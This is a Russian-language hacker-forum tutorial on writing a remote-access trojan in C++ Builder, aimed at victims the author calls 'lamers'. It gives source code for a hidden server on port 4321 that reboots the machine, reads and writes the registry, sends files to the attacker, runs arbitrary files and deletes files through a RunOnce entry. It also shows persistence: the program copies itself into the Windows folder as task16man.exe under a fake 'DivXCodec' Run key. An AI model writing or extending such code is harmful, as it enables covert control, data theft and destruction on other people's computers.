Пишем своего трояна — HackZona.Ru

Пишем своего трояна

Пишем своего трояна

Тип статьи:
Со старой ХакЗоны.
Источник:
HI/low, dear papst!

Сегодня мы будем учиться писать троянчик. Небольшой, но СВОЙ! Почему? Конечно-конечно, троянов в сети навалом, но рано или поздно они =вдруг= начинают определяться антивирусами, приходиться ждать апдейта етц… Ожидание — самый скучный повод. Не знаю как вы, но я ждать не люблю, да и использовать чужие трояны это совсем не по-}{аЦкERR'ски. Короче, пишем свой троян и точка.

После точки, как учили в школе, пишем с большой буквы… Так вот, о чем я? Писать я буду, как обычно, на своем любимом Builder C++. Если у вас руки растут не оттуда, откуда у меня ноги, то без проблем все переделаете под Дельфи, если припрет конечно...

Естественно, наш троян будет состоять из 2х частей =) Серверной (отправляемой как подарок ламерюге) и клиентской (оставим себе на память). Надо сказать, что я давно не юзал никакие трояны, так что не знаю что там сейчас они умеют делать, может уже и коврик под мышкой научились двигать или корпус компа открывать. Мы же пишем «троянчик», поэтому делать он будет только следующее:
1) читать, удалять, запускать файлы на удаленном компьютере
2) работать с реестром на удаленном компьютере
3) ну и традиционный набор разных бесполезных функций, типа открытие CD-ROM'a, смена клавишей мышки etc.

Перекурили и поехали!
Использовать будем стандартные компоненты TClientSocket и TServerSocket.

Начнем с клиента. Набрасываем простенький интерфейс и приступаем к реализации. Управлять удаленным компьютером будем с помощью специальных команд. Для примера пускай структура их будет такая:
Nпараметры. N — цифра. Каждому действию присвоен свой код. Т.е. например 1 — перезагрузка, 2 — чтение файла и т.д. Главное чтоб было однозначное соответствие между тем что хотим сделать (команда передаваемая клиентом) и тем что выполняет программа (обработка команды на сервере). С этим разобрались. Теперь параметры. Бывает мало передать только номер команды. Конечно, чтобы перезагрузить компьютер никаких параметров не надо (хотя можно и здесь передать параметры в функцию перезагрузки), но как например реализовать удаление файла не передавая параметра? Мы передаем команду на удаление файла, но какого?! Для этого будем использовать параметры. В качестве параметра в данном случае будет передаваться имя файла. Бывает, что мало передать один параметр. Например надо прочитать n-строчек из file.txt. Здесь необходимо передать 2 параметра. В нашем примере параметры отделяются друг от друга комбинацией «rn» — перевод каретки. Объясняется данная структура тем, что в сервере мы сначала помещаем полученную команду в TStringList и потом можем спокойно обращаться к любой строчке этого TStringList'а через свойство Strings[i], где i-номер строчки, а соответственно и номер параметра. В общем, это вещи достаточно очевидные.

Вот так, вроде бы только начав писать клиентскую часть мы ее уже почти и закончили! Ведь на самом деле ничего кроме отсылки команд и приема ответов от сервера она делать и не должна. Для приема ответов просто создадим поле TMemo и добавим обработчик события OnRead нашего компонента TClientSocket:

void __fastcall TForm1::TrojControllerRead(TObject *Sender,
TCustomWinSocket *Socket)
{
Memo2->Lines->Add(Socket->ReceiveText());
}

Вот и все. Клиент законен! Переходим к серверу...

Сервер будет чуть пообъемнее. Вначале определимся с задачами:
1) получение команд
2) их обработка и выполнение соответствующих действий
3) отсылка ответа клиенту (должны же мы знать что происходит на сервере)
Реализуем...

Во-первых, никакого визуального оформления естественно не будет =) Поэтому на форму поместим только 1 компонент: TServerSocket. Инициализацию его проведем в функции FormCreate(). Хотя можно было бы просто прописать 2 параметра в Object Inspector'е. Но раз уж сделали, так сделали =)

void __fastcall TForm1::FormCreate(TObject *Sender)
{
// ServSckt — наш компонент TServerSocket
ServSckt->Port = 4321;
ServSckt->Active = true;
}

Итак, указали порт, активизировали сокет. Теперь обрабатываем событие ClientRead, т.е. получение данных сокетом. Комментирую на примере:

void __fastcall TForm1::ServScktClientRead(TObject *Sender,
TCustomWinSocket *Socket)
{
RecCommand(Socket->ReceiveText()); // пишем для наглядности функцию обработки поступившей
// информации, которую передаем как параметр этой функции
}
//---------------------------------------------------------------------------
// собственно сама функция: Rec — сокращение от Recognize. Можно по-другому назвать =)
void TForm1::RecCommand (String received)
{
int cn;
TTrojanUtilites Utilz; // создаем объект наших утилит
Utilz.Sock=ServSckt; // необходимо для отсылки ответа клиенту, так как сокет у нас
// находится на форме, а TTrojanUtilites не имеет никакого отношения
// к форме. Просто передаем указатель на TServerSocket
String temp;
temp=received;
temp.Delete(2,temp.Length()); // получаем первый символ сообщения — номер команды
cn = StrToInt(temp); // преобразуем в число
received.Delete(1,1); // удаляем код команды — остаются одни параметры
switch (cn) { // в соответсвии с полученой командой
// запускаем соотвествующую утилиту
case 1: Utilz.RestartMachine(); break; // перезагрузка
case 2: Utilz.WriteRegistry(received); break; // запись в реестр
case 3: Utilz.ReadRegistry(received); break; // чтение реестра
case 4: Utilz.SendFile(received); break; // чтение файла
case 5: Utilz.DeleteFile(received); break; // удаление файла
case 6: Utilz.ExecuteFile(received); break; // запуск файла
case 7: Utilz.OpenCloseCD; break; // открытие/закрытие CD-ROM
case 8: Utilz.HideMouse(); break; // прячем курсор мыши
case 9: Utilz.SwapMouseButtons(); break; // переключаем кнопки мыши
default:
SendMsgToClient(«Неправильная команда!»); // получена недопустимая команда
// информируем клиента об этом
}
}

Теперь немного подробнее. Мы пишем специальный класс TTrojanUtilites, в котором реализуем все необходимые функции. В RecognizeCommand (String Directive) мы только отделяем команду от параметров и запускаем необходимые методы TTrojanUtilites, передавая по необходимости в них параметры.

Реализация TTrojanUtilites есть то, чем мы сейчас займемся. Класс оформим в отдельном модуле, не забудьте подключить его.

Поехали… Во-первых, подключаем #include <MMSystem.hpp> — необходимо для реализации работы с CD-ROM'ом. Далее пишем все необходимые методы.

Краткие комментарии на примере:

void TTrojanUtilites::OpenCloseCD()
{
TMCI_Open_Parms OpenParm;
TMCI_Generic_Parms GenParm;
TMCI_Set_Parms SetParm;
Cardinal DI;
OpenParm.dwCallback = 0;
OpenParm.lpstrDeviceType = «CDAudio»;
mciSendCommand(0, MCI_OPEN, MCI_OPEN_TYPE, Longint(&OpenParm;));
DI = OpenParm.wDeviceID;
if (!CDROMOPEN)
{
mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_OPEN, Longint(&SetParm;));
CDROMOPEN = true; // открыть
}
else
{
mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_CLOSED, Longint(&SetParm;));
CDROMOPEN = false; // закрыть
}
mciSendCommand(DI, MCI_CLOSE, MCI_NOTIFY, Longint(&GenParm;));
Sock->Socket->Connections[0]->SendText(«Выполнено открытие/закрытие CD-ROM»);
}

Перезагрузка:

void TTrojanUtilites::RestartMachine()
{
if (ExitWindowsEx(EWX_FORCE,0) || ExitWindowsEx(EWX_REBOOT,0));
Sock->Socket->Connections[0]->SendText(«Перезагрузка успешно выполнена.»);
}

Вот тут я не отвечаю за все ОСи, перезагрузка-то будет, но хотелось бы сделать ее как после нажатия кнопки RESET, а так будет послано сообщение WM_...ENDSESSION etc. Короче, пробуйте сами. Могу только подкинуть основные направления поиска: смотри функции ExitWindows(), ExitWindowsEx(), InitiateSystemShutdown() и AbortSystemShutdown(). Для особо продвинутых могу предложить вариант написать надежный ребут под определенную ось и чипсет =) Например, мой прошлый комп стабильно резетился (только в Win9x, в NT не работало) следующей вставочкой:

mov dx,0cf9h
mov al,2
out dx,al
mov al,6
out dx,al

Откуда цифры? Читайте доки по чипсету =) Одним словом, универсального метода перезагрузить комп без WM_...ENDSESSION я не знаю. Если вы знаете — напишите пару строк, не в падлу =)

void TTrojanUtilites::SendFile(String F)
{
TStringList* TTSL=new (TStringList);
TStringList* TTSL2=new (TStringList);
int n, i;
TTSL->Text = F;
if (!FileExists(TTSL->Strings[0]))
{
Sock->Socket->Connections[0]->SendText(«Файл не существует.»);
return;
}
TTSL2->LoadFromFile(TTSL->Strings[0]); // загружаем файл в TStringList
n = TTSL2->Count; // получаем число строк в файле
if (n > StrToInt(TTSL->Strings[1])) // если надо прочитать не весь файл
n = StrToInt(TTSL->Strings[1]); // считываем только необходимое число строк
for (i=0;iSocket->Connections[0]->SendText(TTSL2->Strings[i]); // передаем строки клиенту
}
Вроде тут и объяснять нечего.

void TTrojanUtilites::ReadRegistry(ShortString k)
{
TRegistry* reg=new TRegistry;
String res, ts;
TStringList* TTSL=new TStringList;
HKEY k1;
// параметры передаются в следующем порядке:
//// 0 — root key
//// 1 — key name
//// 2 — value name
//// 3 — value
//// 4 — type of value
TTSL->Text = k;
ts = TTSL->Strings[0]; // выбираем RootKey
if (ts == «HKEY_CLASSES_ROOT») k1 = HKEY_CLASSES_ROOT;
if (ts == «HKEY_CURRENT_USER») k1 = HKEY_CURRENT_USER;
if (ts == «HKEY_LOCAL_MACHINE») k1 = HKEY_LOCAL_MACHINE;
if (ts == «HKEY_USERS») k1 = HKEY_USERS;
if (ts == «HKEY_CURRENT_CONFIG») k1 = HKEY_CURRENT_CONFIG;
reg->RootKey = k1;
reg->OpenKey(TTSL->Strings[1], true); // открываем раздел
ts = TTSL->Strings[3]; // читаем значение параметра опредеоенного типа
if (ts == «Bool») // двоичный (REG_BINARY)
if (reg->ReadBool(TTSL->Strings[2]))
res = «true»;
else res = «false»;
if (ts == «Integer») // числовой (REG_DWORD)
res = IntToStr(reg->ReadInteger(TTSL->Strings[2]));
if (ts == «String») // строковый (REG_SZ)
res = reg->ReadString(TTSL->Strings[2]);
Sock->Socket->Connections[0]->SendText(«Чтение реестра. Значение параметра: „+res);
// передаем клиенту значение параметра
}

Запись в реестр аналогична, только используется метод WriteBool(TTSL->Strings[2], false); для записи булевского значения, WriteInteger(TTSL->Strings[2], StrToInt(TTSL->Strings[4])); — для числового, WriteString(TTSL->Strings[2], TTSL->Strings[4]); — для строкового.

Для запуска файлов на удаленном компьютере используем следующую функцию:

void TTrojanUtilites::ExecuteFile(String f)
{
ShellExecute(GetDesktopWindow, “open», f.c_str(), "", "", SW_SHOWNORMAL);
Sock->Socket->Connections[0]->SendText(«Запущен файл „+f);
}

Файл запускается в той программе, с которой ассоциирован запуск данного типа файлов, т.е. вы можете запускать не толкьо exe, com, bat, но и любые другие файлы. Html-файл откроется в Explorer'e, Opere, Netscape или еще в чем-то… Хрен знает чем там ламерюга пользуется… Можете запустить ему мп3-шку Децла послушать или Бритни какой-нить, пусть проблюется =)

Идем дальше. Парочка бесполезных функций:

void TTrojanUtilites::HideMouse()
{
ShowCursor(false);
Sock->Socket->Connections[0]->SendText(“Курсор мыши скрыт»);
}

No commentz...

void TTrojanUtilites::SwapMouseButtons()
{
SwapMouseButton(true);
Sock->Socket->Connections[0]->SendText(«Кнопки мыши переключены»);

Можно сделать переключение кнопок обратно (передайте в SwapMouseButton параметр false), но я бы посоветовал поставить таймер и каждую секунду переключать кнопки туда-сюда, веселее будет =) В падлу сейчас уже добавлять, но вкратце это будет так: добавляем TTimer на форму, устанавливаем необходимый интервал, и в обработчике события OnTimer прописываем вызов функции SwapMouseButton с параметром, противоположным прошлому вызову. Млин, все-таки все расписал =)

Теперь довольно важная функция:

void TTrojanUtilites::DeleteFile(String f)
{
if (!FileExists(f))
{
Sock->Socket->Connections[0]->SendText(«Файл не существует.»);
return;
}
TRegistry* Reg=new TRegistry;
Reg->RootKey = HKEY_LOCAL_MACHINE;
Reg->OpenKey(«SoftwareMicrosoftWindowsCurrentVersionRunOnce», true);
Reg->WriteString(«Filez for delete»,«command.com /c del „+f);
Reg->CloseKey();
Sock->Socket->Connections[0]->SendText(“Файл „+f+“ будет удален после перезагрузки.»);
}

Данная функция НЕ удаляет файл сразу!!! Это сделано специально, так как файлы могут использоваться системой и их удаление возможно только после перезагрузки, данная функция помечает файл к удалению, а удалиться он только после перезагрузки, которую вы легко можете вызвать. Да, еще маленькое примечание: данная функция удаляет только 1 файл, если вы пометите второй файл к удалению — то будет удален только он. А первый останется нетронутым… Немного измените функцию — и можно будет удалять файлы пачками =) Могу еще добавить немного инфы на случай, если надо будет удалить целый каталог и вы точно знаете что в нем нет открытых файлов. Используйте стандартную API функцию SHFileOperation, установив тип операции wFunc в FO_DELETE. Пример:

int res;
SHFILEOPSTRUCT fo;
ZeroMemory(&fo;, sizeof(fo));
fo.hwnd = hwndOwner; // хэндл окна-владельца прогресс-диалога
fo.pFrom = pszFullPath; //путь
fo.wFunc = FO_DELETE;
fo.fFlags = FOF_NOCONFIRMATION; //не спрашивать подтверждения на удаление
res = SHFileOperation(&fo;);

Только внимательно все проверьте! Будет обломно если ламерюга «вдруг» увидит надпись «Папка голые тетки не может быть удалена, так как юзер активно смотрит сразу 10 порно-фильмов из нее!». А вообще, если опять удалиться в теорию, то наш главный объект Application имеет несколько полезных событий, наиболее интересное для нас OnException происходит тогда, когда в приложении возникает необработанная исключительная ситуация (деление на ноль, удаление несуществующего файла etc). По умолчанию, обработчик этого события вызывает метод ShowException для отображения окна сообщения с пояснением причины ошибки (оно нам надо?! конечно, НЕТ!). Но, вы можете изменить реакцию на событие onException, переписав его обработчик. Тут ничего трудного нет, просто я не ставил перед собой задачу написать офигенный троян, только подтолкнуть вас к этому =) Кто захочет — допишет все необходимое сам, если что — я подскажу =) Ну вот, вроде бы все функции реализовали. Теперь немного о том, что мы не сделали =) Мы не сделали: загрузку/закачку файла. Это все можно сделать подправив SendFile(). Стандартных функций для пересылки файлов через TClient(Server)Socket я не нашел, но впрочем, это не проблема — просто передавайте файлы фрагментами.

Теперь нам осталось только разобраться с автозагрузкой трояна. Сделаем следующее:
1) при запуске файл переписывается в папку, в которой установлены винды.
2) прописываем запуск нашего файла в реестре.

Реализуем =)

void __fastcall TForm1::FormCreate(TObject *Sender)
{
ServSckt->Port = 4321;
ServSckt->Active = true;
Utilz.Sock=ServSckt;
Utilz.CDROMOPEN=false;

String WinDir;
char WinDir1[144];
GetWindowsDirectory(WinDir1,144);
WinDir=WinDir1; // папка с установленными виндами

String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey(«SoftwareMicrosoftWindowsCurrentVersionRun», true);
data=pReg->ReadString(«DivXCodec»);
if (data != Application->ExeName) //если нашу программу стерли из
// автозагрузки (DivXCodec — можете поменять по желанию на любое другое название раздела)
pReg->WriteString(«DivXCodec»,WinDir+«task16man.exe»); //добавляем ее по новой

if (Application->ExeName!=WinDir+«task16man.exe») //если файл запустили 1ый раз
{
if (!FileExists(WinDir+«task16man.exe»))
{
String dest=WinDir+«task16man.exe»;
BOOL res=MoveFile(Application->ExeName.c_str(), dest.c_str());
// переписываем файл к виндам
ServSckt->Active = false;
ShellExecute(NULL,NULL,dest.c_str(),NULL,NULL,NULL); //запускаем его
Application->Terminate(); // это приложение закрываем
}
else
Application->Terminate();
// я тут не разбирал вариантов типа прога записалась в винды, но ее еще раз
// запустили и им подобных, додумайте сами =)
}
else
{
ServSckt->Port = 4321;
ServSckt->Active = true;

String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey(«SoftwareMicrosoftWindowsCurrentVersionRun», true);
data=pReg->ReadString(«DivXCodec»);
if (data != Application->ExeName) // не дай бог стерли!
pReg->WriteString(«DivXCodec»,Application->ExeName); // пишем назад
}
}

В принципе, это все. Троян готов! Конечно, он тяжеловат, малофункционален etc, НО все это можно исправить, творите =) Если сделаете что-нибудь интересное — скидывайте, с радостью опубликуем это для всех. А вообще, я хочу сейчас все это переделать под API Socket'ы, без всяких компонентов, тогда и файл exe гораздо меньше станет. Если у кого-нибудь есть интерес к этому делу — напишите пару строк в мыльницу.

Товарищи ламеры! Внимательно следите теперь за соединениями по порту 4321 =) Некоторые ведь ничего не перекомпиливают и не меняют =)

На этом у меня все. Критика, предложения и 100грамм принимаются, мат и наезды отправляются в /dev/null =) МаЗу с днем рождения!

Клиент [программа и исходный код]
Сервер [программа и исходный код]
Нравится
Не нравится

2 комментария

06:04
а мне интересно. кто не шарит - пусть думает
04:38
я ваше ламер и мало чего понял.....ООЧень прошу скинте троя на мыло [email protected] сам сделать не могу((((